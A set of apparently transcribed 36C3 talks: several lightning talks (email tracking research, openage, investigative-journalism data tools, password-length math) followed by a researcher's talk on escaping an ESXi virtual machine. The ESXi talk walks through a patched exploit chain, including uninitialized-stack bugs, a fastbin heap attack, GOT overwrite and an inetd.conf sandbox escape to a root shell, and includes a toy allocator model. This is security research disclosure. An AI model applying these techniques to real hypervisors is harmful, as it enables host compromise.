that only belongs to this service. You sign up with that service using this address; the service will send us the opt-in message, we will check that there are no shenanigans going on, and then confirm the registration of the newsletter. Please don't try to register accounts: we will not click confirmation links, thank you very much. And then we will receive the newsletters. We receive them on our email server and get them into our crawler. Our crawler uses OpenWPM, which is basically a variant of Firefox that you can remote control and that is intended for online privacy research. With that software we then open the email and also click a link, and we track all of the interactions that are happening, so all of the requests that are being sent and so on. The results are of course written into a database, and then we have an analyzer that creates the results we can display on our website. This is a subset of what you can see on our website. You can see, for example, that if you read the newsletter from spiegel.de, there are four external parties that are contacted when you open the email, including Spiegel themselves, but also Newsletter2Go and IOAM, which is some sort of German tracking company. Similarly, when you click a link, there are additional third parties that are included in basically a long redirect chain until you reach your final destination. I actually gave a longer talk on this topic at GPN this year, so if you're interested in more details, take a look at that talk. You can find the link to it down at the bottom, at mass.xyz/talk/gpn2019; there you find the slides, the paper, everything, and of course a link to the platform. So you can play with the platform at privacymail.info. It is of course open source, so you can also send pull requests or take a look at what it looks like. And right now I have a student who is working on redesigning the interface, and for that we would be really interested in finding out what your priorities and concerns are when it comes to email tracking: is it worse if they track which links you click, is it worse if they track whether you open the email, and so on. So if you have three minutes of time and are willing to fill out a survey, you would help us a lot with this redesign. And with that, thank you very much. I'm running around here at congress, feel free to talk to me. Thank you. Next up is openage. So hi, we are the openage maintainers and this is our yearly update talk. openage is a free engine clone of Age of Empires 2. We are trying to provide the original look and feel of the game, and for that we need to use the original assets, since we are no artists, but we plan to support free replacement asset packs. The project was started six years ago, when we didn't really know what we were doing, with the main goal of providing unlimited extension possibilities — think support for more than eight players, an actually sane networking stack, or really crazy map mods like a zombie survival pack or whatever. There are a lot of similar projects for other classic games, which you can see conveniently listed here. The game is based on C++17, with Python 3 used for scripting and Cython for the glue layer.
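As a toy illustration of the two tracking mechanisms the PrivacyMail talk above describes — remote resources that fire a request when the mail is opened, and per-recipient tokens in links — the following sketch scans an HTML string for both. This is only a naive heuristic of mine, not PrivacyMail's real OpenWPM-based crawler; the sample HTML and the token regex are invented for illustration.

```python
import re
from html.parser import HTMLParser

class TrackerSniffer(HTMLParser):
    """Collect remote images (view tracking) and links carrying long opaque
    query tokens (interaction / identity tracking)."""

    def __init__(self):
        super().__init__()
        self.remote_images = []
        self.tokenised_links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "img" and attrs.get("src", "").startswith(("http://", "https://")):
            self.remote_images.append(attrs["src"])
        if tag == "a" and re.search(r"[?&]\w+=[A-Za-z0-9_-]{16,}", attrs.get("href", "")):
            self.tokenised_links.append(attrs["href"])

newsletter_html = """
<img src="https://tracker.example/open.gif?u=3f9c0a7d2e4b48d1">
<a href="https://news.example/article?rid=Zk3qP9vX2mL8tR5wQ7uY">Read more</a>
"""

sniffer = TrackerSniffer()
sniffer.feed(newsletter_html)
print("remote images:", sniffer.remote_images)
print("personalised-looking links:", sniffer.tokenised_links)
```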
So Age of Empires is still very active even in 2019, because Microsoft just released the Definitive Edition with vastly enhanced graphics and a fancy new UI. Yeah, we're not quite that far, but we're getting there. This year we mainly had a documentation overhaul with fancy Sphinx stuff, defined our modding API, started the conversion of the original game to that new API, have continuous integration for macOS and Windows, nightly builds for those and Linux, and we have the world's first SMX/SMP conversion for the Definitive Edition graphics. With that we can extract, for example, the Asian graphics set assets. Then we have nightly builds hosted for convenient download, and continuous integration is now based on AppVeyor. The documentation now also looks way fancier and is easier to browse and read. Maybe you remember from our previous talks that our configuration system is this domain-specific nyan language; we now need to use that to create asset packs. In order to create those we have to convert the original Genie engine data to our engine, and this is the structure of the converter: we convert the data to intermediate objects, which we then basically export to our format, and in parallel we can export the media files, the images and sounds. Our goal engine architecture looks roughly like this: we have a separation between the simulation of the game world and the presentation of that game world. So the next steps to reach that are to actually implement the presenter and to extend the simulation engine for the actual gameplay features. Then we need scalable pathfinding, because we want to support many, many units, and we also have to think about how we do that over the network. With the scripting API we need to introduce the Python side, so that artificial intelligence programming can also be done, with fancy machine learning or whatever you like. In the past years we had 140 contributors, so if you have some interest in joining, we'll always be happy to have you and you can crunch some issues. To reach us you can either visit us at our assembly or join one of our chat rooms, or write to us on whatever other platform we have. We also have a blog where we occasionally post status updates on whatever is going on in the project. So in case you want to check us out, here are the GitHub links, and we'd be happy to see you contributing. Thanks. Thank you. Next up is BSides Amsterdam. Hi. BSides is a community-led conference for people involved in security, and local organizers create their own instance in their city. Last year I discovered BSides, and there was an event which was going to be hosted in Amsterdam — they've been hosting it for the last two years — and I thought that's where I would like to be, so I decided to get involved and contribute. And if you want to check it out, whether you're in the Netherlands or in Germany or Belgium, you're welcome to come and visit and see and talk. So send us your proposal before the end of February, and perhaps I can see your talk. Thank you. Alright. Thank you.
Uh then next up is let's invent futuristic sleep and dream technologies. Hello. Um I'm Chris Sofa and uh welcome to my uh lightning talk. Let's invent futuristic sleep and dream technologies. Um so wouldn't it be cool to go to sleep and wake up with new knowledge or skills? So for example go to bed and in the morning next day you suddenly speak Spanish or speak a new programming language. Um or to have quite high quality restful sleep no matter where you are. Or to maybe have some immune system boosting sleep so maybe you have a code like like I have at the moment and you just go to sleep and uh it doesn't take seven days but it just takes one night until you are healthy again or maybe cure other diseases overnight or maybe even have interactive dreaming so um be able to talk from within your dreams to the waking world or maybe to other dreamers. Um there are many other ideas that can be thought of about uh how the future of our sleep and dream experience might look like and actually I'm looking for people who want to invent these kind of futuristic sleep and dream technologies uh together with me. Um not for the money so this is strictly non-profit um but uh just to uh improve the sleep and dream experience of potentially billions of people and of course also to have a fun while developing this uh crazy things and uh making things possible that are seemingly impossible. And yeah it might take decades uh to invent these kind of uh stuff so learning a new knowledge uh new language for example during sleep but um well why not start today and move closer to this uh goal uh step by step. And so actually I've started already um with uh this uh project uh set up a small website and uh also connected to professional sleep and dream researchers. I also conducted some first studies with them and also started publishing the results in peer review journals. Um also developed some stuff and um also I uh recycled some old stuff from my PhD which was actually about sleep research. I was a sleep laboratory manager at a university for some years and um now after this time I just do this as a hobby anymore. And yeah but uh so some things have been prepared but the real fun is starting only now so actually really inventing these kind of things uh getting some uh ideas what could be done um and uh also then to find ways to make this possible somehow. And yeah so if you uh find this interesting and if you want to get involved into this because maybe you have some ideas uh what could be done, what should be done, also what maybe should not be done uh about futuristic sleep and dream experiences or if you want to develop some uh hardware, software, printed circuit boards whatever um or if you have some other skills that might be available even if you don't really know what uh and when and how to do uh stuff that uh could contribute to this then please uh get in touch with me um either via email. So I've created this uh email address, futuristic sleep dream text at protonmail.com uh or talk to me here at the conference and I'm really happy to uh hear from as many as possible from you. And uh if you first want to read more about it then there's this website SD20.org which stands for sleep and dreaming in 20 years um so you will find some more information on that website. And yeah so uh let's invent futuristic sleep and dream technologies. Thank you. Then next up is investigating organized crime. Hey everybody um so my name is Friedrich. 
I work with a group of investigative journalists that's kind of spread throughout um the world and as I mainly use in Europe. And um I want to talk about the technology aspects of what we can do to facilitate the work of investigative reporters. Most people in this room will probably first think about um security aspects, cryptography, but what I am most interested in is uh the security aspect of what we can do to facilitate the work of investigative journalists. And so I'm really excited to talk about um security aspects, cryptography, but what I'm most interested in is kind of the data analysis aspect of doing this. Um so for example a little while ago um in early December we published a series of stories um about a company called FormationSouse um based in the UK that set up all kinds of weird fraud on schemes around the world. They used to be in the forest in Cameroon and grow weed there and um all of which was kind of very shady and illegal. Um but how do we get to these stories, right? How do we kind of get to this evidence? Um the data that we got was basically a dump of that company's server, right? Coming from a group called DitoSecrets. And um it comes as zip files, right? Massive zip files where you have millions of emails, you've got documents, you've got even a dump of a MySQL database that they used internally. And how do you go from there to actually having journalism, right? How do you tell stories based on just random zip files? Um so you, reporters need access to structured and unstructured data, right? Sometimes data is in documents, sometimes data is also in a structured database um and people need to be able to see that. Um then you need to be able to find overlap between data sets, right? So if you have an email in one, in one uh dataset that might be um might have a phone number in its signature, right? And that phone number was then in another dataset used to set up a company that might already be the crucial connection that you need to find in order to link things and tell good story. And then also this stuff gets really complicated, right? We look into a lot of offshore companies and so um what we need to do is we need to also keep track of what we're finding. Um so for a couple years now we've been working on this thing called the ALIF project and it's at this point kind of a toolkit of different components. Um there's a search engine um called ALIF which is basically um kind of a graph, knowledge graph explorer that can um give people access both to um both to structured data, unstructured data, um can do forensics on large numbers of file types and extract all the kind of useful bits and pieces and show up connectivity between them. Um it can also do cross-referencing between different datasets, right? So if you have like a list of all the politicians in the country and you have a list of all the offshore companies in the Panama Papers, you can just kind of go and compare that. And we've also been working on this thing called VIZ which is basically for making these little network diagrams where people can kind of keep track of what their stories are. And obviously all of this stuff is free software and um I'd really like to find people to work on that, help us. Um especially if you are maybe a pen tester or you want to work on more data import mechanisms or better data visualizations. Um one thing that's kind of particularly fun about this um is that basically underlying all of it is just streams of JSON entities. 
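As a rough picture of what such line-based entity streams and a naive cross-reference might look like, here is a small sketch. The real ontology lives in the followthemoney library and Aleph's matching is far more sophisticated, so every field name, the sample records and the matching rule below are simplifications of mine, purely for illustration.

```python
import json

# Two pretend datasets as "FtM-style" entities: an id, a schema and a
# properties dict (field names simplified for this example).
leak_entities = [
    {"id": "leak-1", "schema": "Person",
     "properties": {"name": ["Jane Q. Shell"], "email": ["jane@formations.example"]}},
    {"id": "leak-2", "schema": "Company",
     "properties": {"name": ["Sunrise Holdings Ltd"]}},
]
register_entities = [
    {"id": "reg-9", "schema": "Person",
     "properties": {"name": ["JANE Q SHELL"], "country": ["pa"]}},
    {"id": "reg-3", "schema": "Person",
     "properties": {"name": ["Somebody Else"]}},
]

def stream(entities):
    """Serialise entities the way they travel between tools: one JSON per line."""
    return "\n".join(json.dumps(e) for e in entities)

def norm(name):
    """Crude normalisation so 'Jane Q. Shell' and 'JANE Q SHELL' compare equal."""
    return "".join(ch for ch in name.lower() if ch.isalnum())

leaks = [json.loads(line) for line in stream(leak_entities).splitlines()]
register = [json.loads(line) for line in stream(register_entities).splitlines()]

# Naive cross-reference: the same normalised name in both streams is a candidate
index = {norm(n): e for e in register for n in e["properties"].get("name", [])}
for entity in leaks:
    for name in entity["properties"].get("name", []):
        if norm(name) in index:
            print("candidate match:", name, "<->", index[norm(name)]["id"])
```

The output is only a list of candidates; as in the talk, a reporter still has to look at each match and decide whether it deserves their attention.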
So you can think about structured data and unstructured data both as just line-based feeds of JSON entities. They're all formatted according to an ontology that we've developed, basically a knowledge graph model that we've called FollowTheMoney. So a lot of what we do is just convert stuff to this FollowTheMoney format, and then you can do whatever kind of operations you need to do with it. In this case, for example, you can just pip install a thing that downloads all the people from the 29 Leaks, the Formations House data that I was showing, puts them in a JSON file, and then you can take that JSON file with all the people that have been sending and receiving emails in that data dump and say: okay, there's those, and then there's the Panama Papers data published by ICIJ, and find me possible matches between them. Then you've got yourself a list of candidates, and that's something a journalist might already want to look at and say: okay, if someone is both involved in dealing with Formations House and was also mentioned in the Panama Papers, that's good enough for me to spend my time and attention on. And yeah, if anyone is interested in hacking on tools for investigative reporters, go to alephdata.org. Thank you.

Thank you. And next up is the very small one-by-one of passwords. One by one? One times one? Okay, yeah, I have looked it up: it's "the very small one-times-one of passwords". It's actually a stripped-down version of a bigger talk. There are some amazing passwords out there, and for me the interesting questions are: is my password actually working, and how do I manage all these passwords? So let's start with how we manage all these passwords. I can strongly recommend using a password manager at some point, because with that you can set different passwords for each account, and you don't lose track of which password you used on which account in which iteration, and so on. There are a few password managers around, for example password-store, aka pass; there's KeePass; you can also use a notebook, if you store it safely in some place. There are lots of possibilities. Unfortunately, you still have to remember some passwords to unlock the password managers. So if we have a password prompt, the next thing is called brute-force protection, and that's some sort of mechanism that prevents the password from simply being tried out. But brute-force protection is actually harder than you might think, and that leads to the right password length, because long is good but not always practical. That means I have to determine somehow how long my password has to be, and maybe we can calculate the needed length. Maybe you remember the xkcd comic with the diceware passphrase, where they just string together a certain number of words and say: oh, it's much easier to remember some random words from a word list. The system behind that is diceware, because you can basically roll a die five times and then pick a word from a list with the number you have diced. So how does that work? Basically, let's go back to the air shield example on the first slide: one two three four five is a number, obviously. So can I build all my passwords as a number? If I have a certain set of characters, we have different number systems with different amounts of digits or characters in them, so yes, those are all numbers, and there is a formula for that: you take the number of digits, raised to the power of the length of your password, and you get the number of combinations. For a 256-bit key in the binary system it's a huge amount; for a four-digit numerical PIN it's obviously a bit fewer combinations. Now the idea is that we take those amounts and make an equation out of them, then we transform this equation and we get a nice formula for how many digits we actually need for a certain strength of password. So let's assume that we use alphanumerical characters, so we have 56 digits; then for a 256-bit-equivalent key we need 44 characters, and you can try to remember the example at the bottom of the slide, which is very hard to remember. So now back to diceware: diceware means we have 7776 words that can be randomly chosen, either by rolling a die or by using some software. We put that into the formula and we get a length of 19 words that we need. That's much easier to remember, but the password is a bit longer. And that's it for the math so far. There are some two-factor systems around if you want to secure your accounts even more: you just use a second factor with SMS TANs, one-time pads, or some unique password lists. And always remember: biometrical attributes are passwords that can't be changed once they have been lost, but on the bright side, you can use them as a second factor too. And finally, there are application tokens, so an application gets its own password and does not have to be authorized with the user's password. Application tokens are not used frequently enough, but they're worth a try. You can find the full 45-minute talk in the archives of the PrivacyWeek 2019, which was held in Vienna, and I hope I will be there at the next PrivacyWeek. Thank you very much.

Thank you. So this concludes today's lightning talk session. Thank you very much for being here. Please give a big round of applause for all of the speakers who were here on stage today, and again, for having to deal with so many speakers in such a short time, a big round of applause for the translation team.
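The arithmetic behind this needed-length formula is easy to check yourself. Here is a minimal sketch, not from the talk: the symbol-set sizes other than the 7776-word diceware list are my own assumptions, so the results may differ slightly from the numbers on the slides depending on rounding and the exact character set.

import math

def needed_length(alphabet_size: int, target_bits: int = 256) -> int:
    """Smallest n such that alphabet_size ** n >= 2 ** target_bits."""
    return math.ceil(target_bits / math.log2(alphabet_size))

# A handful of symbol sets; the sizes other than 7776 are my assumptions.
examples = {
    "decimal PIN (10 digits)": 10,
    "alphanumeric (62 characters)": 62,
    "diceware word list (7776 words)": 7776,
}

for name, size in examples.items():
    n = needed_length(size)
    print(f"{name}: {n} symbols for ~256-bit strength "
          f"(~{n * math.log2(size):.0f} bits)")

For the diceware list this computes 20 words rather than the 19 mentioned above; the difference comes down to rounding and the exact security target chosen on the slide.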
Lightning Talks are short lectures (almost) any congress participant may give! Bring your infectious enthusiasm to an audience with a short attention span! Discuss a program, system or technique! Pitch your projects and ideas or try to rally a crew of people to your party or assembly! Whatever you bring, make it quick! To get involved and learn more about what is happening please visit the Lightning Talks page in the 36C3 wiki.
10.5446/53223 (DOI)
So like many operators, in my group we actually use a lot of ESXi servers. You would think that after using these things for 10 years I would know how to speak, but I do not. We use these for virtualizing machines. Some of these actually run sandboxes or run kind of dubious software, so we really do want to prevent these processes from jumping from the virtual environment to the hypervisor environment. Today we have F1YYY (he wants to be known by F1YYY, so I am respecting that), and he is from the Chaitin security research lab. He is going to show us the exploits that he discovered for, I think it was, last year's Chinese GeekPwn capture-the-flag, and he is going to show us how these things work. And with that, I would like to ask you to help me welcome F1YYY onto the stage. Thank you.

Hello. Hello. Thanks for the introduction. Good evening, everybody. I'm F1YYY, a senior security researcher at Chaitin Technology. I'm going to present the great escape of ESXi: breaking out of a sandboxed virtual machine. We demonstrated this full exploit chain at GeekPwn 2018. I will introduce our experience of escaping the sandbox on ESXi, and I will also introduce the work we have done on the sandbox on ESXi. Now let's start.

We come from the Chaitin Security Research Lab. We have researched many practical targets in recent years, including PS4 jailbreaks, Android rooting, IoT offensive research and so on. Some of us also play CTF with team b1o0p and Tea Deliverers; we recently won the championship at the HITCON CTF final. We are also the organizers of the Real World CTF. We created some very hard challenges this year, so if you are interested, we welcome you to participate in our CTF game.

Now, before we start our journey of escaping the virtual machine, we need to figure out what a virtual machine escape actually is. I'd like to ask: has anyone here used virtualization software like VMware Workstation, Hyper-V, VirtualBox and so on? Please raise your hands. Okay, okay. Thanks. So if you are a software engineer or a security researcher, you have probably used virtualization software. But has anyone heard the words "virtual machine escape"? If you have, please raise your hand again. Oh, it surprises me that all of you know about that, but I have to introduce it anyway. What is a virtual machine escape? In normal circumstances, the guest OS runs on the hypervisor, and the hypervisor handles the sensitive instructions executed by the guest OS. The host side emulates virtual hardware and handles RPC requests from the guest OS. That's the architecture of normal virtualization software, and the guest OSes are isolated from each other and cannot affect the host OS. However, if there are bugs or vulnerabilities in the host side, it's possible for the guest OS to escape from the virtualization environment: it can exploit these vulnerabilities and finally execute arbitrary code on the host. So that is a virtual machine escape.

Then why did we choose ESXi as our target? The first reason is that more and more companies are using, or plan to use, a private cloud to store their private data, including these companies. And vSphere is an enterprise solution offered by VMware; it's popular with companies. If you are a network administrator of a company, you may know about VMware vSphere. And ESXi is the hypervisor for VMware vSphere.
So it's widely used in private clouds. That's the first reason. The second one is that it's a challenging target for us. There have been several exploitations of VMware Workstation in recent years: hackers escaped from VMware Workstation by exploiting vulnerabilities in graphics cards, network cards, USB devices and so on. But there had been no public escape of ESXi before, so it's a challenging target for us, and we love a challenge.

Then why is ESXi so challenging? The first reason, I think, is that there is little documentation about its architecture. The only thing we could find is a white paper offered by VMware, and the white paper only includes some definitions and pictures, without details. So let's take a brief look at the architecture of ESXi first. ESXi is an enterprise bare-metal hypervisor, and it includes two parts: the kernel, which is the VMkernel developed by VMware, and the other part, the user world. The VMkernel is a POSIX-like operating system and it uses an in-memory file system, which means that all files stored in this file system are not persistent. The VMkernel also manages hardware and schedules resources for ESXi, and it includes the VMM, drivers, the network stack, and some user-world APIs offered to the user world. "User world" is the term VMware uses to refer to the processes running on the VMkernel operating system, a group of these processes. These processes can only use a limited /proc directory and limited signals, and they can use just some of the POSIX APIs. For example, there are user-world processes like hostd, sshd, vmx and so on. That's the architecture of ESXi.

I'd like to give you an example to show how a virtual machine works on ESXi. The VMX process in the user world can communicate with the VMM by using some undocumented, customized system calls, and the VMM will initialize the environment for the guest OS. When the guest OS executes some sensitive instructions, it will cause a VM exit and return to the VMM. The VMX process also emulates virtual hardware and handles RPC requests from the guest. That's how a virtual machine works on ESXi. Then how can we escape from the virtual machine on ESXi? If there is a vulnerability in the virtual hardware of the VMX, we can write a driver or an exploit to escape from it: the driver communicates with the virtual hardware and exploits the vulnerability, and finally we can execute shellcode in the VMX process. That means we have successfully escaped from the virtual machine on ESXi.

The second reason why ESXi is so challenging is the user-world API. The VMX uses many undocumented and customized system calls, and if you want to reverse some code of the VMX, it's hard to understand which API the VMX is using. But luckily, we found two system call tables, with symbols, after decompressing the k.b00 file. This file will be useful if you want to reverse some code of the VMX. That's the second reason. Then there are some security mitigations here, including ASLR and NX, which means we may need to leak some address information before we start our exploit, to break the randomization of the address space. Furthermore, after testing, we found that there is another mitigation on ESXi: a sandbox that isolates the VMX process. So even if you can execute shellcode in the VMX process, you cannot execute any commands.
You cannot read any sensitive files unless you escape from the sandbox as well. And finally, we think that the VMX of ESXi has a smaller attack surface. After comparing the VMX binaries of Workstation and ESXi, we found that some functions have been moved from the VMX in the user world into the VMkernel. For example, the packet transmission function of the E1000 network card has been moved from the VMX to the VMkernel. And if you have read some security advisories published by VMware recently, you may have noticed that there are many vulnerabilities in the packet transmission part of the E1000 network card, and all of those vulnerabilities only affect Workstation. So we think that the VMX of ESXi has a smaller attack surface.

Now let's start the journey of escaping from ESXi. Let's overview the entire exploit chain first. We use two memory corruption vulnerabilities in our exploit. The first one is an uninitialized stack usage vulnerability, whose CVE number is CVE-2018-6981, and the second is an uninitialized stack read vulnerability, whose CVE number is CVE-2018-6982. We can do an arbitrary address free by using the first vulnerability, and we can get an information leak from the second one. By combining these two vulnerabilities, we can achieve arbitrary shellcode execution in the VMX process. And finally, we use a logic vulnerability to escape the sandbox of the VMX and get a reverse root shell from the ESXi host. That's the entire exploit chain we use.

Now let's start with the first one. The first vulnerability is an uninitialized stack usage vulnerability. It exists in the VMXNET3 virtual network card. When the VMXNET3 card tries to execute the command "update MAC filters", it uses a structure on the stack, the physical memory page structure. This structure is used to represent the memory mapping between the guest and the host, and it's also used to transport data between the guest and the host. The VMXNET3 code calls the DMA memory create function to initialize the structure on the stack first, then it uses this structure to execute the command, and finally it uses the physical memory release function to destroy the physical memory page structure. So it seems that there are no problems here. But if we look at the DMA memory create function, we notice that there is a check before the initialization of the physical memory page structure: it checks the address argument and the size argument. If the check passes, it initializes the structure; but if the check fails, it never initializes the structure on the stack. And we found that we can control the address argument by writing a value to one of the registers of the VMXNET3 device. What's worse, in the physical memory release function there is no check of whether the physical memory page structure has been initialized; it just frees a pointer from this structure. So that's the thing: if we can pad data onto the stack, it's possible for us to do an arbitrary address free. We can pad a fake physical memory page structure onto the stack, then make the check fail in the DMA memory create function, and finally, when it comes to the physical memory release function, it will free a pointer from our fake physical memory page structure. So we just had to find a function to pad data onto the stack. There is a design pattern in software development: when we allocate some memory, we store the data on the stack if the size is small, and otherwise we put it on the heap. And we found a function that fits this pattern.
This function is used when our guest OS executes the OUTS instruction. It checks the size: if the size is smaller than 0x8000, it uses the stack to store the data, and finally it copies the data we send from the guest onto the stack. So we can use this function to pad data onto the stack. Then how do we combine this to get an arbitrary address free? We use the OUTS instruction in the guest OS first to pad data onto the stack. This data should contain a fake physical memory page structure; the page count of this fake structure should be 0, and the page array pointer of this physical memory page structure should be the address we want to free. Then we set some registers of the VMXNET3 device to make the check fail in the DMA memory create function. Finally, we order the VMXNET3 network card to execute the command "update MAC filters", and the VMX will then use the physical memory release function to destroy the structure we padded before, the fake structure we padded in the first step. It checks the page count: if it's 0, it frees the page array pointer of this fake structure. So we can now do an arbitrary address free by using the first uninitialized stack usage vulnerability.

Here comes the next one. The second vulnerability also exists in the VMXNET3 network card. When the VMXNET3 card tries to execute the command "get policy", it first gets a length from the guest, and the length must be 16. Then it initializes the first 8 bytes of a structure on the stack, but it just forgets to initialize the next 8 bytes of this structure and writes the structure back to our guest OS. So we can leak 8 bytes of uninitialized stack data from the host to our guest. And after debugging the VMX process, we realized that there are fixed offsets between the images, so it's possible for us to get all the information about the address space by using this vulnerability.

So what do we have now? We can do an arbitrary address free by using the first vulnerability, and we can get all the information about the address space by using the second one. What do we want to do? We want arbitrary shellcode execution in the VMX. So how do we combine these two vulnerabilities to achieve our target? It's hard to get arbitrary shellcode execution from an arbitrary address free, but it's easy to get arbitrary shellcode execution from an arbitrary address write. So our target becomes: how do we turn an arbitrary address free into an arbitrary address write? Then we realized that we need a structure, and this structure should include pointers we can write through, and a size. Once we can overwrite this structure, we can do arbitrary address writes easily. When we first tried to exploit this vulnerability, we used some structures in the heap, but we found that we cannot manipulate the heap layout stably, because the VMX frequently allocates and releases memory. So we cannot use the structures in the heap. After reversing some code of the VMX, we found a structure. The structure's name is "channel", and it's used in VMware RPCI. What's VMware RPCI? VMware has a series of RPC mechanisms to support communication between the guest and the host, and they have an interesting name: backdoor. RPCI is one of them. And the other words we may be familiar with are "VMware Tools". I'd like to ask again: if anyone has installed VMware Tools in your guest OS, please raise your hands again. Oh, not as many as before. So if you use VMware Workstation, you have probably installed VMware Tools in your guest.
Because once you install it, you can use some convenient functions such as copying and pasting data and files between the guest and the host, dragging and dropping files, creating a shared folder, and so on. VMware Tools is implemented using RPCI commands. Here are some examples of RPCI commands: for example, we can use "info-set guestinfo..." to set some information about our guest, and we can use "info-get" to retrieve this information back. What happens when we execute such an RPCI command in our guest? For example, if we execute the RPCI command "info-set guestinfo.a 123" in our guest OS, what happens in the VMX? It causes a VM exit first, and finally it returns to the RPCI handler of the VMX. Then the RPCI handler chooses a sub-command to use by checking the values of the registers of our guest OS. The RPCI code in our guest OS uses the open sub-command first, to open a channel and initialize it. Then it uses the send-length sub-command to set the size of our channel and allocate heap memory to store the data of our RPCI command. Subsequently it uses the send-data sub-command to add data to the memory we allocated before. Once the length of the data we have sent from the guest equals the size we set with the send-length sub-command, the VMX calls the corresponding RPCI command handler function, after a string comparison. And finally it uses the close sub-command to destroy the channel structure, which includes setting the size to zero and freeing the data pointer. So that's what happens when we execute this RPCI command in our guest. Furthermore, there is an array of channel structures in the data segment that we can use. So this is a perfect structure for our exploit.

Now we've got all the things we want: we've got two vulnerabilities, and we've got the structure we want. How do we combine them? We noticed that the VMX uses the ptmalloc allocator of glibc to manage its heap, so we chose to use the fastbin attack. What's the fastbin attack? The fastbin attack is a method to exploit heap vulnerabilities in ptmalloc by abusing its singly linked free lists, and it's the easiest method to exploit ptmalloc, I think; it's also the first method I learned when I just started to learn heap exploitation. Then, after considering the checks existing in glibc, we decided to free an address inside channel N, at its reply field, because by doing that glibc will treat this address as a fake chunk, and glibc will check the chunk size. Done this way, the size field of the fake chunk coincides with the size field of channel N, so we can store a valid value in the size of channel N to bypass the check. Once we free this address, the fake chunk is put into the fastbin linked list first. Then we can reallocate this fake chunk through another channel, N+2. Now we have a data pointer pointing at the reply field of channel N, and we can easily overwrite channel N+1 by using channel N+2: we send data to channel N+2, and it overwrites parts of channel N+1. So it's now easy for us to do an arbitrary address write by faking some parts of the channel structure.

Then, do you remember our target? Our target is arbitrary shellcode execution in the VMX, and we can do arbitrary address writes now. There are many ways to get arbitrary shellcode execution from an arbitrary address write; we chose to use ROP. We can overwrite the GOT/PLT segment.
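The fastbin trick narrated above is easier to see with a toy model. The following sketch is neither glibc nor VMware's code; it is a deliberately simplified LIFO free list with a single size check, meant only to illustrate why freeing a fake chunk whose size field you control makes a later allocation hand back attacker-chosen memory. All names and addresses are invented.

class ToyFastbin:
    """Toy model of a fastbin-style allocator: a LIFO free list where
    free() only sanity-checks the size field stored in front of the chunk."""

    def __init__(self, memory):
        self.memory = memory          # dict: address -> value, a simulated process memory
        self.freelist = []            # singly linked free list, modelled as a LIFO stack
        self.bin_size = 0x40          # this bin serves chunks whose size field is 0x40

    def free(self, addr):
        # The allocator trusts the size field sitting just before the chunk.
        size = self.memory.get(addr - 8)
        if size != self.bin_size:
            raise ValueError("invalid chunk size")   # the only check in this toy model
        self.freelist.append(addr)

    def malloc(self):
        # A later allocation of the same size returns the most recently freed chunk,
        # even if that "chunk" was never handed out by the allocator in the first place.
        return self.freelist.pop() if self.freelist else None


memory = {}
FAKE_CHUNK = 0x601000                 # pretend this sits inside the channel array in the data segment
memory[FAKE_CHUNK - 8] = 0x40         # attacker-controlled "size" field passes the check

heap = ToyFastbin(memory)
heap.free(FAKE_CHUNK)                 # free a fake chunk inside attacker-chosen memory
print(hex(heap.malloc()))             # the next allocation returns 0x601000, an overlapping pointer

In the exploit described in the talk, that controlled size field is the size member of channel N and the reallocated chunk becomes the data buffer of channel N+2, which is why writes through N+2 land on top of channel N+1.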
We can fake the channel N+1 structure first: overwrite the data pointer of channel N+1 with the address of the GOT/PLT segment, and then overwrite a function pointer in the GOT/PLT segment. So once the VMX uses the function we overwrote, it jumps to our ROP gadget. So it's also easy for us to get arbitrary shellcode execution by using ROP. Now we can execute arbitrary shellcode in the VMX process, and we thought we had successfully escaped from the virtual machine on ESXi. We tried to execute some commands using a system call, but it failed. We tried to open and read some sensitive files, like the password file; it failed again. Then we realized that there is a sandbox: we cannot execute any commands unless we escape the sandbox as well.

So the next part is how we analyzed and escaped the sandbox. After realizing that there is a sandbox on ESXi, we reversed some code of the VMkernel and found a kernel module implementing an access control system for the VMkernel. This module implements fine-grained checks on system calls, and it seems that this sandbox is a rule-based sandbox. So we just tried to find the configuration files of this sandbox. We finally found them in the directory /etc/vmware/secpolicy/domains, and it seems that there are many different sandbox domains offered by VMware to the different processes in the user world, like an app domain, a plugin domain, and the global VM domain, which is the domain for our VMX process and for our VM. After reading that, it was obvious to us that /var/run is the only directory we have read and write permissions for. Then we looked at the files in this directory. We found a lot of PID files, like crond.pid, dcui.pid and so on, and it was also obvious that inetd.conf is the only configuration file we can write.

So, what's inetd? inetd is open source software; it's a super-server daemon that provides internet services. We analyzed the content of inetd.conf on the ESXi: it defines two services, SSH and authd, and it also defines which binary is used by each service; for example, /sbin/authd is used by the authd service. After some testing, we realized that the authd service is always enabled, whether the SSH service is on or off. And this is the only configuration file we can write. Then we got an idea: how about overwriting this configuration file? We can overwrite the binary path for authd, for example replace /sbin/authd with a shell, so that once we can restart the inetd process, we can bind a shell on the port that authd is using. Then we just needed a way to restart the inetd process. We analyzed the configuration files of the sandbox again and found that we can use the kill system call in the VMX process. So we just use kill with SIGHUP to restart the inetd process. Once the inetd process restarts, we can execute any commands by sending them to the port authd is using. So that's the method we used to escape from the sandbox.

You can find the demo on YouTube; we created this demo after GeekPwn 2018. We get a reverse shell after executing the exploit in our guest OS. So that's all, and if you want more details about our exploit chain, please check our paper here. That's all, thanks.

So, I don't think I'm actually worthy to share the stage with F1YYY. That was awesome. If you have questions, we have microphones: you need to come up to a microphone and line up behind it, and we'll take your question.
Meanwhile, does the signal angel have anything? No questions yet? Do we not have questions from the audience? There's one. Can I have number six, please? Okay. Did you talk to VMware about this little hack? We reported all these vulnerabilities to VMware after GeekPwn 2018, and it has been one year since they were patched. Okay, thanks. That's definitely a relief. Number one, please. First of all, thanks for the great talk. I just wanted to know if there's any meaningful thing a system administrator can do to lock down the sandbox further, so that we have some preventative measures for our ESXi setups, or if there's nothing we can do except patching, of course. I'm afraid... can you repeat your question? It's faster for me, sorry about that. Basically, is there anything you can do as an administrator to lock down the sandbox even more, so that this is impossible, or at least harder than what you showed? Okay, that's the first question. You can lock the sandbox down further by executing a command in the ESXi shell. I didn't put the command here; I found it myself by using what is offered on the ESXi shell, it's not documented by VMware. Okay, I will share this command on my Twitter later. Sorry about that, I didn't put this command into my slides. But would this have prevented the attack? By doing that change, by running that command, would it be possible to prevent the attack that you just showed? The sandbox is used to protect the VMX process. If you update your ESXi, I think it will be safe. Okay, great. We have a question from the internet. Yes: does this exploit also work on non-AMD-V/VT-x enabled VMs using binary translation? Okay, is it more universal than just AMD-V or VT-x? Well, can you repeat it a bit? Does it also work on non-AMD-V or VT-x enabled VMs using binary translation? Yes, because all these vulnerabilities exist in the virtual hardware; 